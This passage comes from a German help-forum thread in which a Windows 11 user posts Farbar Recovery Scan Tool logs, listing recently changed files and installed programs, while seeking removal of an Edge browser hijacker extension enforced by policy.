2022-05-23 14:52 - 2022-05-23 14:52 - 000466456 _____ (Creative Labs) C:\Windows\system32\wrap_oal.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000444952 _____ (Creative Labs) C:\Windows\SysWOW64\wrap_oal.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000122904 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\system32\OpenAL32.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000109080 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\SysWOW64\OpenAL32.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000000000 ____D C:\Users\Pauli\AppData\Local\Dovetail Games 2022-05-23 14:52 - 2022-05-23 14:52 - 000000000 ____D C:\Program Files (x86)\OpenAL ==================== Ein Monat (geänderte) ================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2022-06-20 17:30 - 2022-04-08 20:49 - 000000000 ____D C:\Windows\dl 2022-06-20 17:29 - 2022-04-08 20:41 - 000000000 ____D C:\Program Files (x86)\Steam 2022-06-20 17:29 - 2022-04-08 19:27 - 000000000 ____D C:\ProgramData\NVIDIA 2022-06-20 17:29 - 2022-04-08 19:19 - 001223640 _____ () C:\Windows\system32\wpbbin.exe 2022-06-20 17:29 - 2022-04-08 19:19 - 001164992 _____ C:\Windows\system32\AsusUpdateCheck.exe 2022-06-20 17:29 - 2022-04-08 19:19 - 000012288 ___SH C:\DumpStack.log.tmp 2022-06-20 17:29 - 2022-04-08 19:19 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2022-06-20 17:29 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SystemTemp 2022-06-20 17:29 - 2021-06-05 14:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-06-20 17:28 - 2021-06-05 19:52 - 000756916 _____ C:\Windows\system32\perfh007.dat 2022-06-20 17:28 - 2021-06-05 19:52 - 000156108 _____ C:\Windows\system32\perfc007.dat 2022-06-20 17:28 - 2021-06-05 14:10 - 000000000 ___HD C:\Windows\system32\GroupPolicy 2022-06-20 17:28 - 2021-06-05 14:01 - 000524288 _____ C:\Windows\system32\config\BBI 2022-06-20 17:26 - 2021-06-05 14:10 - 000000000 ___HD C:\Program Files\WindowsApps 2022-06-20 17:26 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\AppReadiness 2022-06-20 17:25 - 2022-04-08 20:49 - 000000000 ____D C:\Windows\cc 2022-06-20 17:25 - 2022-04-08 19:24 - 001750916 _____ C:\Windows\system32\PerfStringBackup.INI 2022-06-20 17:25 - 2021-06-05 14:09 - 000000000 ____D C:\Windows\INF 2022-06-20 17:22 - 2022-04-08 19:23 - 000004784 _____ C:\Windows\system32\Tasks\MicrosoftEdgeShadowStackRollbackTask 2022-06-20 17:22 - 2022-04-08 19:19 - 000002622 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-06-20 17:22 - 2022-04-08 19:19 - 000002460 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2022-06-20 17:19 - 2022-04-08 19:32 - 000000087 _____ C:\Windows\skipsavetoini 2022-06-20 17:16 - 2022-04-08 19:35 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2022-06-20 17:16 - 2022-04-08 19:34 - 000000000 ____D C:\Windows\system32\Tasks\ASUS 2022-06-20 17:16 - 2022-04-08 19:32 - 000000000 ____D C:\Program Files (x86)\ASUS 2022-06-20 17:15 - 2022-04-08 19:36 - 000000000 ____D C:\Program Files\ASUS 2022-06-20 17:15 - 2022-04-08 19:32 - 000000000 ____D C:\ProgramData\Package Cache 2022-06-20 17:13 - 2022-04-08 19:30 - 000000000 __RHD C:\Users\Public\AccountPictures 2022-06-20 17:13 - 2022-04-08 19:19 - 000000000 ____D C:\ProgramData\ASUS 2022-06-20 17:12 - 2022-04-08 19:36 - 000032304 _____ (Creative Technology Innovation Co., LTd.) C:\Windows\system32\Drivers\CtiAIo64.sys 2022-06-20 17:06 - 2022-04-08 19:30 - 000000000 ____D C:\Users\Pauli\AppData\Local\D3DSCache 2022-06-20 17:04 - 2022-04-08 19:19 - 000000000 ____D C:\Windows\system32\SleepStudy 2022-06-20 15:48 - 2022-04-08 19:30 - 000000000 ____D C:\Users\Pauli\AppData\Local\Packages 2022-06-20 11:04 - 2021-06-05 14:10 - 000000000 ___HD C:\Windows\ELAMBKUP 2022-06-20 09:45 - 2021-06-05 14:01 - 000000000 ____D C:\Windows\CbsTemp 2022-06-19 21:45 - 2022-04-08 21:45 - 000000000 ____D C:\XboxGames 2022-06-19 21:41 - 2022-04-08 19:28 - 000000000 ____D C:\ProgramData\Packages 2022-06-19 21:34 - 2022-04-08 21:54 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2022-06-19 21:22 - 2022-04-08 19:20 - 000001623 _____ C:\Windows\system32\config\VSMIDK 2022-06-19 21:21 - 2021-06-05 14:18 - 000233808 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys 2022-06-19 21:21 - 2021-06-05 14:18 - 000069960 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vkrnlintvsc.sys 2022-06-19 21:21 - 2021-06-05 14:18 - 000069952 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vkrnlintvsp.sys 2022-06-19 21:19 - 2022-04-08 19:32 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1424437550-2087844553-323541659-1001 2022-06-19 21:19 - 2022-04-08 19:32 - 000003378 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1424437550-2087844553-323541659-1001 2022-06-19 21:19 - 2022-04-08 19:32 - 000002395 _____ C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2022-06-19 21:09 - 2022-04-08 19:19 - 000292792 _____ C:\Windows\system32\FNTCACHE.DAT 2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files\Windows Photo Viewer 2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___SD C:\Windows\SysWOW64\F12 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___SD C:\Windows\system32\F12 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\vi-VN 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\oobe 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\lv-LV 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\lt-LT 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\id-ID 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\gl-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\eu-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\et-EE 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\es-MX 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\Dism 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\ca-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SystemResources 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\vi-VN 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\oobe 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\lv-LV 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\lt-LT 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\id-ID 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\gl-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\eu-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\et-EE 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\es-MX 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\Dism 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\DDFs 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\ca-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\appraiser 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\ShellExperiences 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\ShellComponents 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\PolicyDefinitions 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\bcastdvr 2022-06-19 15:44 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\WeMod 2022-06-18 21:41 - 2022-04-09 12:49 - 000000000 ____D C:\Users\Pauli\AppData\Local\CrashDumps 2022-06-18 16:39 - 2022-04-08 21:43 - 000002169 _____ C:\Users\Pauli\Desktop\WeMod.lnk 2022-06-18 16:39 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WeMod 2022-06-18 16:39 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Local\WeMod 2022-06-18 16:38 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Local\SquirrelTemp 2022-06-17 14:23 - 2022-04-29 20:04 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\LGHUB 2022-06-17 14:10 - 2022-04-29 20:04 - 000000000 ____D C:\Users\Pauli\AppData\Local\LGHUB 2022-06-17 14:04 - 2022-04-08 19:34 - 000000000 ____D C:\Windows\system32\MRT 2022-06-17 14:03 - 2022-04-08 19:34 - 145918784 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2022-06-17 14:01 - 2022-04-08 19:22 - 003101184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll 2022-06-15 13:48 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\SecurityHealth 2022-06-13 16:25 - 2022-04-30 13:17 - 000000000 ____D C:\Users\Pauli\Documents\My Games 2022-06-12 18:11 - 2022-05-13 19:14 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Setup 2022-06-12 14:41 - 2022-05-13 20:23 - 000000000 ____D C:\Program Files\LGHUB.d47858fb-ee82-4f88-8d4f-f004e34df74b 2022-06-11 19:57 - 2022-04-15 19:31 - 000000000 ____D C:\Program Files (x86)\Origin 2022-06-11 19:57 - 2022-04-09 14:33 - 000000000 ____D C:\ProgramData\Origin 2022-06-10 14:58 - 2022-04-08 22:50 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\.minecraft 2022-06-10 12:48 - 2022-04-09 17:44 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\paradox-launcher-v2 2022-06-09 18:57 - 2022-04-08 20:41 - 002762208 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000402920 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000230864 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000198112 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000136672 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000062928 _____ (Microsoft Corporation) C:\Windows\system32\gamemodcontrol.exe 2022-06-07 14:23 - 2022-04-13 20:51 - 000008698 _____ C:\Users\Pauli\Documents\HudSight.txt 2022-06-06 20:49 - 2022-04-08 20:49 - 000000000 ____D C:\Program Files (x86)\Salfeld 2022-06-06 17:59 - 2022-04-08 19:27 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2022-06-05 15:34 - 2022-04-14 16:00 - 000000000 ____D C:\Users\Pauli\AppData\Local\EpicGamesLauncher 2022-06-05 15:22 - 2022-04-11 21:20 - 001431256 _____ (Wellbia.com Co., Ltd.) C:\Windows\xhunter1.sys 2022-06-02 19:32 - 2022-04-15 19:31 - 000000000 ____D C:\ProgramData\Electronic Arts 2022-06-02 19:31 - 2022-04-09 13:01 - 000000000 ____D C:\Program Files\EA Games 2022-06-02 17:35 - 2022-04-09 23:13 - 000000000 ____D C:\ProgramData\TruckersMP 2022-06-02 12:47 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\NDF 2022-06-01 20:51 - 2022-04-08 19:32 - 000000000 ____D C:\Users\Pauli\AppData\Local\PlaceholderTileLogoFolder 2022-05-30 17:01 - 2022-04-09 13:03 - 000000000 ____D C:\Users\Pauli\AppData\Local\UnrealEngine 2022-05-29 17:04 - 2022-04-08 19:33 - 000000000 ____D C:\Users\Pauli\AppData\Local\NVIDIA 2022-05-29 17:02 - 2022-04-08 19:45 - 000004308 _____ C:\Windows\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003976 _____ C:\Windows\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003940 _____ C:\Windows\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003894 _____ C:\Windows\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003654 _____ C:\Windows\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2022-05-29 17:02 - 2022-04-08 19:27 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2022-05-23 20:58 - 2022-04-17 12:34 - 000000217 _____ C:\Users\Pauli\Desktop\Flashing Lights - Polizei, Feuerwehr, Rettungsdienst-Simulator.url 2022-05-21 05:22 - 2022-04-08 19:49 - 000724688 _____ (NVIDIA Corporation) C:\Windows\system32\nvml.dll 2022-05-21 05:18 - 2022-04-08 19:27 - 007618584 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll 2022-05-21 05:18 - 2022-04-08 19:27 - 006465200 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll ==================== SigCheck ============================ (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) ==================== Ende von FRST.txt ======================== |
20.06.2022, 16:37 | #7 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Addition Log: Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 19-06-2022 durchgeführt von Pauli (20-06-2022 17:31:20) Gestartet von C:\Users\Pauli\Desktop Microsoft Windows 11 Pro Version 21H2 22000.739 (X64) (2022-04-08 17:20:31) Start-Modus: Normal ========================================================== ==================== Konten: ============================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) Administrator (S-1-5-21-1424437550-2087844553-323541659-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1424437550-2087844553-323541659-503 - Limited - Disabled) Gast (S-1-5-21-1424437550-2087844553-323541659-501 - Limited - Disabled) Pauli (S-1-5-21-1424437550-2087844553-323541659-1001 - Administrator - Enabled) => C:\Users\Pauli WDAGUtilityAccount (S-1-5-21-1424437550-2087844553-323541659-504 - Limited - Disabled) ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 7-Zip 21.07 (x64) (HKLM\...\7-Zip) (Version: 21.07 - Igor Pavlov) ARMOURY CRATE Lite Service (HKLM\...\{EF3944FF-2501-4568-B15C-5701E726719E}) (Version: 5.1.4 - ASUS) ASUS AIOFan HAL (HKLM\...\{EAE80DED-1A39-41C5-9F60-87CC947F6454}) (Version: 1.1.47.0 - ASUSTek COMPUTER INC.) Hidden ASUS AIOFan HAL (HKLM-x32\...\{306eac2e-72d3-456a-9e4a-b866ff11d0df}) (Version: 1.1.47.0 - ASUSTek COMPUTER INC.) Hidden ASUS AURA Extension Card HAL (HKLM\...\{237E1CAC-1708-4940-AC34-DF15C079AB70}) (Version: 1.1.0.18 - ASUSTeK COMPUTER INC.) Hidden ASUS AURA Extension Card HAL (HKLM-x32\...\{4e2b05b0-eb08-41e5-9eb3-cdcc43d6bee0}) (Version: 1.1.0.18 - ASUSTeK COMPUTER INC.) Hidden ASUS AURA Motherboard HAL (HKLM\...\{4EBEAC95-76BC-46A8-8644-6E2F1C87CF70}) (Version: 1.3.0.0 - ASUSTeK COMPUTER INC.) Hidden ASUS AURA Motherboard HAL (HKLM-x32\...\{6085fcf6-a968-45bf-9f5a-ad97944d2cb4}) (Version: 1.3.0.0 - ASUSTeK COMPUTER INC.) Hidden ASUS Aura SDK (HKLM\...\{CF8E6E00-9C03-4440-81C0-21FACB921A6B}) (Version: 3.04.11 - ASUSTek COMPUTER INC.) Hidden ASUS AURA VGA Component (HKLM\...\{71BB96A6-EAC4-45AE-A17D-D3ED43FF1D14}) (Version: 0.0.5.2 - ASUSTek COMPUTER INC. ) Hidden ASUS AURA VGA Component (HKLM-x32\...\{01046094-ee17-433b-bb06-43fc27d10679}) (Version: 0.0.5.2 - ASUSTek COMPUTER INC. ) Hidden ASUS Framework Service (HKLM-x32\...\{8bc53c84-d9aa-4cc6-b19c-261f445494dc}) (Version: 2.1.3.0 - ASUSTek COMPUTER INC.) ASUS Framework Service (HKLM-x32\...\{EA6A87BE-8AD3-40D2-944C-9DF5FBFF4332}) (Version: 2.1.3.0 - ASUSTek COMPUTER INC.) Hidden ASUS Motherboard (HKLM-x32\...\{93795eb8-bd86-4d4d-ab27-ff80f9467b37}) (Version: 3.00.25 - ASUSTek Computer Inc.) ASUS Mouse HAL (HKLM\...\{B8F984F2-7887-4DD2-8D96-F9A4BC5A4AC5}) (Version: 1.2.0.33 - ASUSTek COMPUTER INC.) Hidden ASUS Mouse HAL (HKLM-x32\...\{6cd7e9ad-20e2-48e3-a884-bae1e16d1868}) (Version: 1.2.0.33 - ASUSTek COMPUTER INC.) Hidden ASUS Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.107.79 - ASUSTeK Computer Inc.) Hidden AURA DRAM Component (HKLM\...\{9AFE5429-866B-457D-A864-80BCF7672EE8}) (Version: 1.1.18 - ASUS) Hidden AURA DRAM Component (HKLM-x32\...\{c3ae9104-ed9b-4ab5-9eb1-569697f4514b}) (Version: 1.1.18 - ASUS) Hidden AURA lighting effect add-on (HKLM-x32\...\{1E2EA04B-FCA7-457E-B6F4-F33E1858E859}) (Version: 0.0.21 - ASUS) AURA lighting effect add-on x64 (HKLM\...\{C5A4A164-4428-4931-B728-96EEF0FA3C44}) (Version: 0.0.21 - ASUS) AURA Service (HKLM-x32\...\{0E536061-3B55-4D45-BF58-0BDA261C94B0}) (Version: 3.05.40 - ASUSTeK Computer Inc.) Hidden AURA Service (HKLM-x32\...\{a1318319-c95b-48da-beb8-63ed6e4d809a}) (Version: 3.05.40 - ASUSTeK Computer Inc.) CORSAIR iCUE 4 Software (HKLM\...\{D73161EC-0B74-45DE-9908-6B2B583DFDA5}) (Version: 4.22.203 - Corsair) CPUID ASUS CPU-Z 1.97 (HKLM\...\CPUID ASUS CPU-Z_is1) (Version: 1.97 - CPUID, Inc.) Discord (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Discord) (Version: 1.0.9004 - Discord Inc.) Dynamic Application Loader Host Interface Service (HKLM\...\{3FD9F3E6-059D-4E4D-8B5B-EBAE90CA882E}) (Version: 1.0.0.0 - Intel Corporation) Hidden EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.220.5191 - Electronic Arts) Hidden EA app (HKLM-x32\...\{7e128ed4-7e5b-480d-aeb3-0e178dd9d723}) (Version: 12.0.220.5191 - Electronic Arts) ENE RGB HAL (HKLM\...\{E050E98C-5524-4AFB-9E53-97700BEF2C02}) (Version: 1.1.39.18 - Ene Tech.) Hidden ENE RGB HAL (HKLM-x32\...\{cf6be873-4fda-41b6-87c1-54f5f726365d}) (Version: 1.1.39.18 - Ene Tech.) Hidden ENE_EHD_M2_HAL (HKLM\...\{37A48B7F-D4EA-4863-844E-A284E2AA3C5D}) (Version: 1.0.9.12 - ENE TECHNOLOGY INC.) Hidden ENE_EHD_M2_HAL (HKLM-x32\...\{97f3a665-a91b-4def-91e2-97fec9f22bfa}) (Version: 1.0.9.12 - ENE TECHNOLOGY INC.) Hidden Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.) Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.) Farmers Dynasty (HKLM-x32\...\{A87FBF41-2485-4161-9CAB-F97EC1C18E61}) (Version: 1.05.0.0 - TOPLITZ PRODUCTIONS) FIFA 22 (HKLM-x32\...\{67F7ABF6-2557-4756-923A-AB99086B1490}) (Version: 1.0.75.5367 - Electronic Arts) GameSDK Service (HKLM-x32\...\{021d69c3-d686-4a94-8fb5-fd1ee782fb14}) (Version: 1.0.5.0 - ASUSTek COMPUTER INC.) GameSDK Service (HKLM-x32\...\{7160DA8D-3F25-4F6E-ABC8-F693551D82FA}) (Version: 1.0.5.0 - ASUSTek COMPUTER INC.) Hidden Grand Theft Auto V (HKLM-x32\...\{5EFC6C07-6B87-43FC-9524-F9E967241741}) (Version: 1.0.2628.2 - Rockstar Games) HudSight (HKLM-x32\...\HudSight_is1) (Version: 1 - ) Intel(R) Chipset Device Software (HKLM\...\{2EE411D3-03C6-4647-81F5-A3C13F25FDC5}) (Version: 10.1.18838.8284 - Intel Corporation) Hidden Intel(R) Chipset Device Software (HKLM-x32\...\{2d8d3782-0c02-4681-87f4-e004b3d4a8f6}) (Version: 10.1.18838.8284 - Intel(R) Corporation) Intel(R) LMS (HKLM\...\{B76FE067-1B6B-416E-9A99-C1BF5E9A2FC1}) (Version: 1.0.0.0 - Intel Corporation) Hidden Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 2149.16.0.2602 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{3EE91568-6FE3-43AA-9BFC-7496A56D272C}) (Version: 1.0.0.0 - Intel Corporation) Hidden Intel(R) Management Engine Driver (HKLM\...\{E4924222-0A39-4EEE-8F7E-8C95BDFDCFCE}) (Version: 1.0.0.0 - Intel Corporation) Hidden Intel(R) Serial IO (HKLM\...\{8EC4CB19-850D-4BD4-B914-F63DF7DAD67D}) (Version: 30.100.2131.26 - Intel Corporation) Hidden Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.2131.26 - Intel Corporation) Kindersicherung (HKLM-x32\...\Salfeld-Kindersicherung_is1) (Version: - ) Kingston AURA DRAM Component (HKLM\...\{965CDF5F-901C-476F-B3A8-7396701B1129}) (Version: 1.1.12 - KINGSTON COMPONENTS INC.) Hidden Kingston AURA DRAM Component (HKLM-x32\...\{2237a879-7fa4-4e21-ae3b-00f6a649b9d9}) (Version: 1.1.12 - KINGSTON COMPONENTS INC.) Hidden Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Logitech G HUB (HKLM\...\{521c89be-637f-4274-a840-baaf7460c2b2}) (Version: 2022.6.271036 - Logitech) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 102.0.1245.44 - Microsoft Corporation) Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 102.0.1245.44 - Microsoft Corporation) Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\OneDriveSetup.exe) (Version: 22.111.0522.0002 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{6A2A8076-135F-4F55-BB02-DED67C8C6934}) (Version: 4.67.0.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation) Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 